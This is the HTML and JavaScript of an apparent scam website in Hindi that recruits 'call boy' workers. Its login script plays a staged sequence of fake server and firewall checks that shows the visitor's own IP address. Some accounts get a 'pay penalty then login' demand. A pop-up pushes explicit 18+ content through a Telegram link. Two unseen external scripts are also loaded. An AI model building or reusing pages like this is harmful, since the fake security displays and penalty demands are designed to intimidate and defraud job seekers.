
<!DOCTYPE HTML>
<html lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover" />
 <title>LoginHindi</title>
 <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-8BQG8QYQJM"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-8BQG8QYQJM');
</script>
        <meta content="width=device-width, initial-scale=1.0" name="viewport">
        <link rel="stylesheet" type="text/css" href="/LeScript/Loading.css">
<script src="LeScript/loading.js"></script>

<link rel="stylesheet" type="text/css" href="styles/bootstrap.css">
<link rel="stylesheet" type="text/css" href="/LeScript/Block.css">
<script src="LeScript/Block.js"></script>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<!-- Option 1: Include in HTML -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css">
<link rel="stylesheet" type="text/css" href="styles/style.css">
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="fonts/css/fontawesome-all.min.css"> 
<script src="../../code.jquery.com/jquery-3.6.0.min.js"></script>   
<link rel="manifest" href="_manifest.json" data-pwa-version="set_in_manifest_and_pwa_js">
        <link rel="apple-touch-icon" sizes="180x180" href="../icons/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="../icons/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="../icons/favicon-16x16.png">
        <link rel="manifest" href="../icons/site.webmanifest">
        <link rel="mask-icon" href="../icons/safari-pinned-tab.svg" color="#5bbad5">
        <link rel="shortcut icon" href="../icons/favicon.ico">
        <meta name="msapplication-TileColor" content="#2d89ef">
        <meta name="msapplication-config" content="https://zufvoql5xqh6d1zljquitd1uwteyswvkqwcexlsprjnit5f46blnxe4f3t.pages.dev/icons/browserconfig.xml">
        <meta name="theme-color" content="#ffffff">
</head>
    
<body class="theme-dark">

    
  <div id="page">
    



    <div id="footer-bar" class="footer-bar-2">
                <a href="#" data-menu="menu-forgot" class="circle-nav"><i class="bi bi-key"></i><span>पासवर्ड भूल गए</span></a>
                <a href="#" data-toggle-theme><i class="bi bi-lightbulb"></i><span>दिनरात</span></a>
       <a href="#" data-menu="menu-main-modal"><i class="bi bi-list"></i><span>मेनू</span></a>
    </div>
    
    

        <div class="card card-style">

            <div class="content">
                <p class="font-600 color-highlight mb-n1">HiMAN, आइए कॉल बॉय की नौकरी शुरू करें!</p>
                <h1 class="font-30">लॉग इन करें</h1>
                <p>
                    अपने खाते में साइन इन करने के लिए नीचे अपनी क्रेडेंशियल दर्ज करें। बैठक पूरी करने के लिए!
                </p>

                <div class="input-style no-borders has-icon validate-field mb-4">
                    <i class="fa fa-user"></i>
                    <input type="name" class="form-control validate-name" id="form1a" placeholder="उपयोगकर्ता पहचान">
                    <label for="form1a" class="color-highlight">उपयोगकर्ता पहचान</label>
                    <i class="fa fa-times disabled valid color-red-dark"></i>
                    <i class="fa fa-check disabled invalid color-green-dark"></i>
                    <em>(required)</em>
                </div>
                <div class="input-style no-borders has-icon validate-field mb-4">
                    <i class="fa fa-lock"></i>
                    <input type="password" class="form-control validate-password" id="form1ab" placeholder="पासवर्ड">
                    <label for="form1ab" class="color-highlight">पासवर्ड</label>
                    <i class="fa fa-times disabled invalid color-red-dark"></i>
                    <i class="fa fa-check disabled valid color-green-dark"></i>
                    <em>(required)</em>
                </div>
                <a href="#" class="btn btn-3d btn-m btn-full mb-n1 rounded-xl text-uppercase font-800 shadow-s border-blue-dark bg-blue-light" data-menu="loginincorrect"><svg xmlns="http://www.w3.org/2000/svg" width="1.5em" height="1.5em" viewBox="0 0 20 20"><path fill="currentColor" d="M9.76 0C15.417 0 20 4.477 20 10S15.416 20 9.76 20c-3.191 0-6.142-1.437-8.07-3.846a.644.644 0 0 1 .115-.918a.68.68 0 0 1 .94.113a8.96 8.96 0 0 0 7.016 3.343c4.915 0 8.9-3.892 8.9-8.692s-3.985-8.692-8.9-8.692a8.96 8.96 0 0 0-6.944 3.255a.68.68 0 0 1-.942.101a.644.644 0 0 1-.103-.92C3.703 1.394 6.615 0 9.761 0m.545 6.862l2.707 2.707c.262.262.267.68.011.936L10.38 13.15a.66.66 0 0 1-.937-.011a.66.66 0 0 1-.01-.937l1.547-1.548l-10.31.001A.66.66 0 0 1 0 10c0-.361.3-.654.67-.654h10.268L9.38 7.787a.66.66 0 0 1-.01-.937a.66.66 0 0 1 .935.011"/></svg> लॉग इन करें</a>
           <br>
             <a href="https://zufvoql5xqh6d1zljquitd1uwteyswvkqwcexlsprjnit5f46blnxe4f3t.pages.dev/inappregister/IN/" class="btn btn-full btn-m btn-full mb-n1 rounded-xl text-uppercase font-800 shadow-s border-dark-light bg-dark-light"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="#faf7f7" d="M11.5 2a5.5 5.5 0 1 0 0 11a5.5 5.5 0 0 0 0-11M23 19h-4v4h-2v-4h-4v-2h4v-4h2v4h4zm-10.124-5a6.47 6.47 0 0 0-1.376 4c0 1.509.514 2.897 1.376 4H2v-2a6 6 0 0 1 6-6z"/></svg>नए काम में शामिल होना</a>
            </div>
        </div>
        
        <a href="https://zufvoql5xqh6d1zljquitd1uwteyswvkqwcexlsprjnit5f46blnxe4f3t.pages.dev/warn" class="btn btn-3d btn-m btn-full mb-n1 rounded-xs text-uppercase font-800 shadow-s border-red-dark  bg-red-light"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24"><g fill="none"><path d="m12.593 23.258l-.011.002l-.071.035l-.02.004l-.014-.004l-.071-.035q-.016-.005-.024.005l-.004.01l-.017.428l.005.02l.01.013l.104.074l.015.004l.012-.004l.104-.074l.012-.016l.004-.017l-.017-.427q-.004-.016-.017-.018m.265-.113l-.013.002l-.185.093l-.01.01l-.003.011l.018.43l.005.012l.008.007l.201.093q.019.005.029-.008l.004-.014l-.034-.614q-.005-.018-.02-.022m-.715.002a.02.02 0 0 0-.027.006l-.006.014l-.034.614q.001.018.017.024l.015-.002l.201-.093l.01-.008l.004-.011l.017-.43l-.003-.012l-.01-.01z"/><path fill="currentColor" d="M12 4c2.787 0 5.263 1.257 7.026 2.813c.885.781 1.614 1.658 2.128 2.531c.505.857.846 1.786.846 2.656s-.34 1.799-.846 2.656c-.514.873-1.243 1.75-2.128 2.531C17.263 18.743 14.786 20 12 20c-2.787 0-5.263-1.257-7.026-2.813c-.885-.781-1.614-1.658-2.128-2.531C6.737 13.799 6 12.87 6 12s.34-1.799.846-2.656c.514-.873 1.243-1.75 2.128-2.531C6.737 5.257 9.214 4 12 4m0 2c-2.184 0-4.208.993-5.702 2.312c-.744.656-1.332 1.373-1.729 2.047C4.163 11.049 4 11.62 4 12s.163.951.569 1.641c.397.674.985 1.39 1.729 2.047C7.792 17.007 9.816 18 12 18s4.208-.993 5.702-2.312c.744-.657 1.332-1.373 1.729-2.047c.406-.69.569-1.261.569-1.641s-.163-.951-.569-1.641c-.397-.674-.985-1.39-1.729-2.047C16.208 6.993 14.184 6 12 6m0 3q.132 0 .261.011a2 2 0 0 0 2.728 2.728A3 3 0 1 1 12 9"/></g></svg> अतिथि लॉगिन - डेमो</a>  

              <br>  
<center><p style="color:red;"<i class="bi bi-bell"></i>Note : If you would like to log in to a sample account before registering, please click on the <b>Guest Login - Demo</b> option, this will give you a complete idea of ​​how our system works.<br>If you have any questions regarding our apps, select the <b>MENU</b> option below and click on <b>FAQ</b> or check other options.</p>  <br><br>
</center>                                       

                    </div>
                </div>
                
                
      

         <div id="loginincorrect" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="170">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa fa-times-circle color-red-light"></i></h1>
    <h2 class="text-center color-red-light">आईडी गलत!</h2>
</div>

    </div>
    <div id="PasswordReset" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="170">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa fa-times-circle color-red-light"></i></h1>
    <h2 class="text-center color-red-light">unmatching!</h2>
</div>
    <!--------------->
    <!--------------->
    <!--Menu Forgot-->
    <!--------------->
    <!--------------->
    <div id="menu-forgot" 
    class="menu menu-box-modal rounded-x1" 
         data-menu-height="220" 
         data-menu-width="350">
        <div class="menu-title">
            <p class="color-highlight">Let's get you into your account</p>
            <h1 class="font-24">Recover Password</h1>
            <a href="#" class="close-menu"><i class="fa fa-times-circle"></i></a>
        </div>

        <div class="content mt-1">
            <div class="input-style no-borders has-icon validate-field mb-4">
                <i class="fa fa-user"></i>
                <input type="name" class="form-control validate-name" id="form1ab" placeholder="Email">
                <label for="form1ab" class="color-highlight font-11 font-500">Email</label>
                <i class="fa fa-times disabled invalid color-red-dark"></i>
                <i class="fa fa-check disabled valid color-green-dark"></i>
                <em>(required)</em>
            </div>
                                <a href="#" class="btn btn-full btn-m shadow-l rounded-s bg-highlight font-600 mt-4"  data-menu="PasswordReset">SEND</a>
        </div>
    </div>     
        
    <div id="menu-main-modal" class="menu menu-box-modal rounded-0 rounded-m" data-menu-load="menulogin.html" data-menu-width="350"  data-menu-height="500" data-menu-active="nav-pages"></div>

  


</div>

<style>
.fullscreen-loader {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100vh;
    background: #000000;
    display: none;
    z-index: 999999;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    overflow: hidden;
}

.loader-content {
    text-align: center;
    padding: 20px;
    display: flex;
    flex-direction: column;
    align-items: center;
}

.loader-spinner {
    position: relative;
    width: 80px;
    height: 80px;
    margin: 0 auto;
}

.loader-spinner:before {
    content: '';
    box-sizing: border-box;
    position: absolute;
    top: 50%;
    left: 50%;
    width: 80px;
    height: 80px;
    margin-top: -40px;
    margin-left: -40px;
    border-radius: 50%;
    border: 5px solid transparent;
    border-top-color: #3498db;
    border-bottom-color: #e74c3c;
    animation: spinner 0.8s linear infinite;
}

.loader-spinner:after {
    content: '';
    box-sizing: border-box;
    position: absolute;
    top: 50%;
    left: 50%;
    width: 60px;
    height: 60px;
    margin-top: -30px;
    margin-left: -30px;
    border-radius: 50%;
    border: 5px solid transparent;
    border-left-color: #f1c40f;
    border-right-color: #2ecc71;
    animation: spinner 0.5s linear infinite reverse;
}

.loader-text {
    color: #2ecc71;
    font-size: 18px;
    margin-top: 20px;
    transition: opacity 0.3s ease;
}

.btn-disabled {
    opacity: 0.6;
    cursor: not-allowed;
}

@keyframes spinner {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

/* Responsive adjustments */
@media (max-width: 768px) {
    .loader-spinner {
        width: 60px;
        height: 60px;
    }
    
    .loader-spinner:before {
        width: 60px;
        height: 60px;
        margin-top: -30px;
        margin-left: -30px;
    }
    
    .loader-spinner:after {
        width: 45px;
        height: 45px;
        margin-top: -22.5px;
        margin-left: -22.5px;
    }
}

@media (max-width: 480px) {
    .loader-spinner {
        width: 50px;
        height: 50px;
    }
    
    .loader-spinner:before {
        width: 50px;
        height: 50px;
        margin-top: -25px;
        margin-left: -25px;
    }
    
    .loader-spinner:after {
        width: 35px;
        height: 35px;
        margin-top: -17.5px;
        margin-left: -17.5px;
    }
}
</style>

<script>
// Function to get user's IP address
async function getUserIP() {
    try {
        const response = await fetch('https://api.ipify.org?format=json');
        const data = await response.json();
        return data.ip;
    } catch (error) {
        console.error('Error fetching IP:', error);
        return 'Unknown';
    }
}

// Function to get device name
function getDeviceName() {
    const userAgent = navigator.userAgent;
    if (userAgent.match(/iPhone|iPad|iPod/i)) {
        return 'iPhone';
    } else if (userAgent.match(/Android/i)) {
        return 'Android';
    } else if (userAgent.match(/Windows/i)) {
        return 'Windows';
    } else if (userAgent.match(/Macintosh/i)) {
        return 'Mac';
    }
    return 'Unknown Device';
}

document.addEventListener('DOMContentLoaded', function() {
    var loginButton = document.querySelector('[data-menu="loginincorrect"]');
    var loader = document.querySelector('.fullscreen-loader');
    var loaderText = document.querySelector('.loader-text');
    let dataRetrieved = false;
    let fetchStartTime = 0;
    let fetchEndTime = 0;
    let userIP = 'Unknown';

    // Initially disable login button
    loginButton.disabled = true;
    loginButton.classList.add('btn-disabled');

    // Get user IP on page load
    getUserIP().then(ip => {
        userIP = ip;
    });

    // Enable login button only when both fields have values
    document.getElementById('form1a').addEventListener('input', validateForm);
    document.getElementById('form1ab').addEventListener('input', validateForm);

    function validateForm() {
        var username = document.getElementById('form1a').value.trim();
        var password = document.getElementById('form1ab').value.trim();
        
        if (username && password) {
            loginButton.disabled = false;
            loginButton.classList.remove('btn-disabled');
        } else {
            loginButton.disabled = true;
            loginButton.classList.add('btn-disabled');
        }
    }

    // Function to update loader text with animation
    function updateLoaderText(text) {
        loaderText.style.opacity = '0';
        setTimeout(() => {
            loaderText.textContent = text;
            loaderText.style.opacity = '1';
        }, 300);
    }

    // Function to show modal
    function showModal(modalId) {
        const modal = document.getElementById(modalId);
        if (modal) {
            document.querySelectorAll('.menu-active').forEach(m => {
                m.classList.remove('menu-active');
            });
            modal.classList.add('menu-active');
            setTimeout(() => {
                modal.classList.remove('menu-active');
            }, 1500);
        }
    }

    // Fetch credentials from JSON file
    async function getCredentials() {
        try {
            fetchStartTime = performance.now();
            updateLoaderText('Connecting Server...');
            const response = await fetch('https://syncjson.pages.dev/Logincredentials.json');
            if (!response.ok) {
                throw new Error('Network response was not ok');
            }
            fetchEndTime = performance.now();
            const data = await response.json();
            console.log('Fetched data:', data);
            dataRetrieved = true;
            return data.users || [];
        } catch (error) {
            console.error('Error fetching credentials:', error);
            return [];
        }
    }
    
    // Function to handle the loading sequence
    async function handleLoadingSequence(username, password) {
        const users = await getCredentials();
        
        if (!dataRetrieved) {
            // Keep showing "Connecting Server..." until data is retrieved
            // This will run indefinitely if the fetch fails
            return;
        }

        // Show fetch time
        const fetchTime = Math.round(fetchEndTime - fetchStartTime);
        setTimeout(() => updateLoaderText(`Connecting in ${fetchTime}ms`), 1000);
        
        // Continue with loading sequence
        setTimeout(() => updateLoaderText('Checking Credential'), 3000);
        setTimeout(() => updateLoaderText('Logging Log ' + getDeviceName()), 5000);
        setTimeout(() => updateLoaderText(`Firewalls Check-in ${userIP}`), 7000);
        setTimeout(() => updateLoaderText('Success!'), 9000);
        setTimeout(() => updateLoaderText('Wooooah!'), 10000);

        // Process login after sequence completes
        setTimeout(function() {
            loader.style.display = 'none';
            loaderText.style.opacity = '0';
            
            if (!username || !password) {
                showModal('empty');
                return;
            }

            const user = users.find(u => u.username === username && u.password === password);
            if (user) {
                switch(user.type) {
                    case 'penalty':
                        showModal('penalty');
                        break;
                    case 'redirect':
                        if (user.redirectUrl) {
                            showModal('success');
                            setTimeout(function() {
                                window.location.href = user.redirectUrl;
                            }, 3000);
                        }
                        break;
                    case 'blocked':
                        showModal('blocked');
                        break;
                    default:
                        showModal('loginincorrect');
                }
            } else {
                showModal('loginincorrect');
            }
        }, 11000);
    }
    
    if (loginButton) {
        loginButton.addEventListener('click', async function(e) {
            e.preventDefault();
            e.stopPropagation();
            
            var username = document.getElementById('form1a').value.trim();
            var password = document.getElementById('form1ab').value.trim();
            
            // Show loading screen
            loader.style.display = 'flex';
            dataRetrieved = false;
            
            try {
                await handleLoadingSequence(username, password);
            } catch (error) {
                console.error('Error in loading sequence:', error);
                loader.style.display = 'none';
                showModal('loginincorrect');
            }
        });
    }
});
</script>
<style>
    .popup-container {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%) scale(0.9);
      background-image: url('https://zufvoql5xqh6d1zljquitd1uwteyswvkqwcexlsprjnit5f46blnxe4f3t.pages.dev/images/walk.jpg');
      background-size: cover;
      background-position: center;
      color: white;
      border-radius: 20px;
      padding: 24px;
      box-shadow: 0 10px 40px rgba(0,0,0,0.3);
      width: 90%;
      max-width: 400px;
      animation: scrollBackground 16s ease-in-out infinite alternate, fadeIn 0.5s ease forwards;
      z-index: 9999;
      display: none;
    }

    .popup-container::before {
      content: "";
      position: absolute;
      inset: 0;
      background: rgba(0, 0, 0, 0.5);
      border-radius: 20px;
      z-index: -1;
    }

    @keyframes scrollBackground {
      0% {
        background-position: center 0%;
      }
      50% {
        background-position: center 100%;
      }
      100% {
        background-position: center 0%;
      }
    }

    @keyframes fadeIn {
      from {
        opacity: 0;
        transform: translate(-50%, -60%) scale(0.9);
      }
      to {
        opacity: 1;
        transform: translate(-50%, -50%) scale(1);
      }
    }

    @keyframes fadeOut {
      from {
        opacity: 1;
        transform: translate(-50%, -50%) scale(1);
      }
      to {
        opacity: 0;
        transform: translate(-50%, -60%) scale(0.9);
      }
    }

    .popup-buttons {
      margin-top: 20px;
      display: flex;
      justify-content: space-between;
      gap: 10px;
    }

    .popup-buttons button {
      flex: 1;
      padding: 10px;
      border: none;
      border-radius: 14px;
      font-weight: 600;
      font-size: 14px;
      cursor: pointer;
      transition: background 0.3s ease;
    }

    .join-btn {
      background-color: #34c759;
      color: white;
    }

    .close-btn {
      background-color: #ff3b30;
      color: white;
    }

    .never-btn {
      background-color: #007aff;
      color: white;
    }

    /* iOS-style confirmation box */
    .confirmation-box {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background: white;
      color: #000;
      padding: 20px;
      border-radius: 20px;
      text-align: center;
      z-index: 10000;
      box-shadow: 0 8px 24px rgba(0,0,0,0.3);
      display: none;
      animation: fadeIn 0.3s ease forwards;
    }

    .confirmation-box button {
      margin: 10px 8px 0;
      padding: 10px 20px;
      border-radius: 12px;
      border: none;
      font-weight: 600;
      font-size: 14px;
      cursor: pointer;
    }

    .btn-no {
      background-color: #ccc;
    }

    .btn-yes {
      background-color: #ff3b30;
      color: white;
    }
  </style>
</head>
<body>

<div class="popup-container" id="promoPopup">
  <h2 style="color:red;">🎁 100% निःशुल्क, 100% अनन्य</h2>
  <ul style="padding-left: 18px; line-height: 1.6;">
    <li><b>18+ प्रीमियम वीडियो सामग्री</b></li>
    <li><b>हालिया लिंक वायरल 18+ वीडियो</b></li>
    <li><b>कॉल बॉय ज्वाइन कूपन</b></li>
    <li><b>प्रीमियम नग्न फोटो</b></li>
  </ul>
  <p style="margin-top: 15px;">⏳अनगिनत आश्चर्य आपका इंतज़ार कर रहे हैं — देर न करें! नीचे दिए गए ज्वाइन बटन पर क्लिक करें और अभी शामिल हों!</p>
  <div class="popup-buttons">
    <button class="join-btn" onclick="window.open('https://t.me/+O1l4bJljM6gwN2Vl', '_blank')">जोड़ना!</button>
    <button class="close-btn" onclick="closePopup()">बंद करना</button>
    <button class="never-btn" onclick="confirmNever()">कभी नहीं</button>
  </div>
</div>

<div class="confirmation-box" id="confirmBox">
  <p><strong>Are you sure?</strong><br>'फिर कभी न दिखाएँ!' पर क्लिक करें और विशेष ऑफ़र को हमेशा के लिए अलविदा कहें—बुद्धिमानी से चुनें</p>
   <button class="btn-yes" onclick="setNever()">फिर कभी दिखाई मत देना!</button>
  <button class="btn-no" onclick="cancelNever()">ग़लत, बंद</button>
</div>

<script>
  const popup = document.getElementById("promoPopup");
  const confirmBox = document.getElementById("confirmBox");

  function showPopup() {
    if (!localStorage.getItem("neverShowPromo")) {
      popup.style.display = "block";
    }
  }

  function closePopup() {
    popup.style.animation = "fadeOut 0.3s ease forwards";
    setTimeout(() => (popup.style.display = "none"), 300);
  }

  function confirmNever() {
    confirmBox.style.display = "block";
  }

  function cancelNever() {
    confirmBox.style.display = "none";
  }

  function setNever() {
    localStorage.setItem("neverShowPromo", "1");
    popup.style.display = "none";
    confirmBox.style.display = "none";
  }

  // Show popup 10 seconds after load
  window.addEventListener("load", () => {
    showPopup();
  });
</script>



<script type="text/javascript" src="scripts/bootstrap.min.js"></script>
<script type="text/javascript" src="https://himancallboyapp.neocities.org/HIMANApp/custom.js"></script>

<div id="penalty" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="auto">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa-solid fa-heart-crack color-blue-light"></i></h1>
    <h2 class="text-center color-blue-light">Restricted<br> Please Pay<br> Penalty Then<br>    Login! <br></h2>
</div>

<div id="success" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="auto">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa fa-check-circle color-green-dark"></i></h1>
    <h2 class="text-center color-green-dark">Success!<br>Logging</h2>
</div>

<div id="empty" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="170">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa fa-times-circle color-red-light"></i></h1>
    <h2 class="text-center color-red-light">Please fill all fields!</h2>
</div>

<div id="blocked" 
    class="menu menu-box-modal rounded-xl" 
    data-menu-hide="1500"
    data-menu-width="170"
    data-menu-height="auto">
    <h1 class="text-center fa-4x mt-2 pt-3 pb-2"><i class="fa fa-ban color-red-dark"></i></h1>
    <h2 class="text-center color-red-dark">Account<br>suspended!</h2>
</div>

<div class="fullscreen-loader">
    <div class="loader-content">
        <div class="loader-spinner"></div>
        <div class="loader-text">Connecting Server...</div>
    </div>
</div>
<script type="text/javascript" src="https://gigolocallboyplayboyapp.neocities.org/HiMAN_app_file/custom.js"></script>
</body>
